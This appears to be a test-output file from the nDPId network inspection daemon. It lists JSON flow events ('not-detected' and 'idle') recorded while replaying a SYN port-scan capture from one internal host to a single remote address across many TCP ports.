+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 